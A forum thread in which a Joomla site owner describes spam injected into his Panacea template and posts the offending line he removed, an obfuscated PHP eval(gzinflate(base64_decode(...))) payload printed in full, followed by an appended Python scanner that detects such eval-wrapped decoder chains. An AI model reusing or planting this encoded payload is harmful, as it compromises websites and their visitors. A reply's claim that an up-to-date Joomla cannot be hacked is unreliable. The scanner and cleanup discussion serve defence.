
Site compromised and now have spam on Joomla Panacea

    • innov8ion
    • Jr. Rocketeer
    • Posts: 49
    • Thanks: 0

    Site compromised and now have spam on Joomla Panacea

    Posted 13 years 5 months ago
    • Our Joomla site was recently compromised and now serves spam in addition to our content. Below is a screenshot of what it looks like.

      I'm trying to determine where the code is that I need to chop out. I know there are many template files and I'm not sure where to look. I've since changed my telnet/ftp passwords. Any advice?

      Thanks!
      Dave

    • JEM
    • Preeminent Rocketeer
    • Posts: 17917
    • Thanks: 4

    Re: Site compromised and now have spam on Joomla Panacea

    Posted 13 years 5 months ago
    • Not a template (or Joomla) issue. You need to revert to your latest backup.
    • Thanks,
      jim
    • innov8ion
    • Jr. Rocketeer
    • Posts: 49
    • Thanks: 0

    Re: Site compromised and now have spam on Joomla Panacea

    Posted 13 years 5 months ago
    • JEM wrote:
      Not a template (or Joomla) issue. You need to revert to your latest backup.
      Reverting back is no longer possible. What are you suggesting it is? It appears on the site, so the bad code is somewhere. I'm just trying to locate and delete it.

      Thanks,
      Dave
    • JEM
    • Preeminent Rocketeer
    • Posts: 17917
    • Thanks: 4

    Re: Site compromised and now have spam on Joomla Panacea

    Posted 13 years 5 months ago
    • As a template club, we cannot be responsible for, or troubleshoot, your issues if you get hacked.

      (Though some members may have an answer...)

      The templates are simply a 'skin' that fits over Joomla, so it is not a template issue.

      If your Joomla version is up to date, as it should be, then there should be no way to hack the site.

      You can look here for useful info:

      www.rockettheme.com/forum/index.php?f=15&t=54455&rb_v=viewtopic
      innov8ion wrote:
      JEM wrote:
      Not a template (or Joomla) issue. You need to revert to your latest backup.
      Reverting back is no longer possible. What are you suggesting it is? It appears on the site, so the bad code is somewhere. I'm just trying to get rid of it.

      Every host that I am familiar with has a back-up policy of at least 3 days. So, you should be able to contact your host if you have nothing to restore to and ask them to reset the site.

      Besides that, get in the habit of backing up your site and not relying on your host by using something like Akeeba. www.akeebabackup.com/

      You could try to upload a clean set of files from your computer to the host, overwriting the damaged files, but there is no guarantee
    • Thanks,
      jim
    • innov8ion
    • Jr. Rocketeer
    • Posts: 49
    • Thanks: 0

    Re: Site compromised and now have spam on Joomla Panacea

    Posted 13 years 5 months ago
    • First, I am using the most recent version of Joomla -- 1.5.23. Second, I use Linode and have backups. It's just that the backups I have are too new.

      I was mainly asking to determine which Panacea template file to look at for the bad code. In any case, I think I found and removed it myself. The following code was in index.php in the panacea template folder. It was below the footer and directly above the closing html tag. Assuming this isn't in your code, it must be this.

      <?php eval(@gzinflate(base64_decode('3Vdbb9pIFP4rJ8iq7ZY1BJpdCZddkuB00aam65DNQxpZxh7CCN9kj7fJtv7vPTO2Idwpfak2UiTmzLlfvuOZthV5yljcaTRmQbvVbJ1pM/IcOO6UhkTzSGOc+WM6Mxunbc2nKZPrcAqv4bdWs1mHwyTHEbNprLEnJqv6JAtdRqMQpm1FyuogMfx3fRW+SGGEnNAFmqaEKZJtGX/fGjeje1lcyA8q/AEsyQh0YOL4KdElj4yzx00S4mKTBGshe/vXZhNjOMNje3E8beE5ACQoJz0aUvsRdcpZ7EeOZ7Mgtj2ayCpXKTfw2JBR63Y+nU5QDyqMUSFL6CylipMkzrOCNMyc1qCB80jShvOvw5wkbaBqTAKXKsLCA3GnkSL3jYvb9x1QDMsaWh1gJIijxEmeIXbYFEJM2STKQq8OCWFZEqrvxsnvslb7lHwKa6qeF1Q936F5YF4NVxV3ZQ0d1eRVdUKNqNeSQn6YUJ/Y5AmbJOVBxlrgnQledYvFojGAy0EhV1hdSK7ZlzhzwGhAMK3z3yvmdMnNkoSEDHg1BQPSPDqZgPjrwpzhF1ho1Jd9HA0+GB0oGblj5U8NR2Auw+nzA7/hVkglwQ+c6OJQELviZ621sIpccgff4US0tuTr9mZgvofL88s/DbgYjuzBR7gaXBsrFQKCnb5ZQX94Z14Pz/tgGnc7NOT57nLCq1egFGnFBG6rgjqPRRpHZbVWC1U5K7nIgPn1bRwoJi7LAXIPGgouqhTtpIqR4Gr2TYSwh8ARxdxiHS5vrevhxxGiyOjWMkfWuXlzZViId7x5Kv/IE3GRG0l+RcL5p+EkElRBcP0oJeIoPPfvBU7abuQR+QG6XUDw5DmUPIynJ/IcZwzvQ4aNs5LtOmfTixSSJ0QZjyg1DKSg5/vn+jnKEsAxo2kHath+9o1h/WNY9zXL+DAcGfZ5v2/VHjS5tmnSC4TlvgoQXjNxd26Z2JQdTPoFpj1A77DdMRAaZmQTdpyUMI8qT3AolN4WfzC8cXQYImKAGJwoexpTjyT7Cl+Exg7HsAyByJW3wZhPw9lWEBOi3wtipb2fHcf2wNgBKHY9MP/6EQzbJr8LwbKylntBrGRUq2AS4ngrIFay6Lua1Ox3oBIVvXJYex7SlUcu1uyIvZr9/Gu1vacf2wc15M3oxxpys/zOhjyoGatG5FGIdbTaijvWaXbENuUf+/+rXZpVq9Q7dpOm9D8+wSmzxZc8Nh2nRBOUWp+oUh2vFo+uJ0TsxAk9RXjBS9Rb1AifCAFe3Ev+g3pUtcLZodUCfbEAv6Nu+YbCbV6kW5ekF30O+TNp1a/ddRMYWxRJaBbVKjt9f3qEYXM42mo87600Wp7PH6n8C0WiMRoX5UMbAEVt+IfmlzKfxdsSIAf8aKHs9EV/yRynODNeTyJcA+5UKXSBkyJeTok7I96AK1scihcjtsPiWmRa2MGe70LKkjhKXzDgi/K1LGAEjfGxWFINZT+IxzAWEp1srTn5whh6immlyNLUUSHizlsd3ryR6DwBQsW9RMUIomn4+hWWaCIR/FA1B+XU9roz1ceiyF9R1DHmacbPucjpUpYXtSkf1fPKbEgvf8iW9mlqf04oc8YcNAV9UT9xxrIvG/oG'))); ?>
    • JEM
    • Preeminent Rocketeer
    • Posts: 17917
    • Thanks: 4

    Re: Site compromised and now have spam on Joomla Panacea

    Posted 13 years 5 months ago
    • Well, as you said, delete the rogue code, that is one solution...

      As I said before, you could upload a new version of the template and overwrite any compromised files... but there is no guarantee that this will be the final solution.

      But perhaps you are all set now?
    • Thanks,
      jim
    • innov8ion
    • Jr. Rocketeer
    • Posts: 49
    • Thanks: 0

    Re: Site compromised and now have spam on Joomla Panacea

    Posted 13 years 5 months ago
    • Usage of the "final solution" makes me cringe a bit. If you don't use base64 encryption in your templates then I think it's gone now... Thanks.
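
Added example, not part of the thread and not RocketTheme or Joomla code: a static scan of a site tree for the pattern found above in the template's index.php, an eval() wrapped around decoder calls, so the remaining .php files can be checked for further copies. It also matches a few other common PHP decoders; the sample site, its folder names and its payload are constructed for illustration.

```python
import base64, os, re, tempfile, zlib

# PHP decoders commonly chained inside eval() to hide injected code.
DECODERS = {"base64_decode", "gzinflate", "gzuncompress", "str_rot13"}
PATTERN = re.compile(  # eval( [@]func( [@]func( ... 'payload'
    r"eval\s*\(\s*@?\s*((?:\w+\s*\(\s*@?\s*)+)(['\"])([A-Za-z0-9+/=\s]+)\2", re.I)

def find_obfuscated_eval(source):
    """Return (line_no, decoder_chain, payload) for each eval(decoder(...'blob'))."""
    hits = []
    for m in PATTERN.finditer(source):
        chain = [f.lower() for f in re.findall(r"\w+", m.group(1))]
        if DECODERS.intersection(chain):
            # 1-based line number of the eval( call within the file
            hits.append((source.count("\n", 0, m.start()) + 1, chain, m.group(3)))
    return hits

def inflate_payload(payload):
    """Undo base64_decode + gzinflate (raw DEFLATE) for reading; never executes it."""
    return zlib.decompress(base64.b64decode(payload), -15)

def scan_tree(root):
    """Walk a site directory; map each .php file that has hits to those hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(".php")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_obfuscated_eval(fh.read())
            if hits:
                report[path] = hits
    return report

def build_sample_site(root):
    """Constructed sample: a clean file plus a template index.php with an injected line."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(comp.compress(b"echo 'constructed sample';") + comp.flush())
    injected = "<?php eval(@gzinflate(base64_decode('%s'))); ?>" % blob.decode()
    tpl = os.path.join(root, "templates", "sample_tpl")  # hypothetical template folder
    os.makedirs(tpl)
    with open(os.path.join(root, "clean.php"), "w") as fh:
        fh.write("<?php echo base64_decode('aGk='); ?>\n")  # no eval, so not flagged
    with open(os.path.join(tpl, "index.php"), "w") as fh:
        fh.write("<html>\n<body></body>\n" + injected + "\n</html>\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        for path, hits in scan_tree(site).items():
            print(path, [(n, chain, inflate_payload(p)) for n, chain, p in hits])
```

A hit in one file does not show how the line got there; every file the scan reports, and any file modified around the same time, needs the same review.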
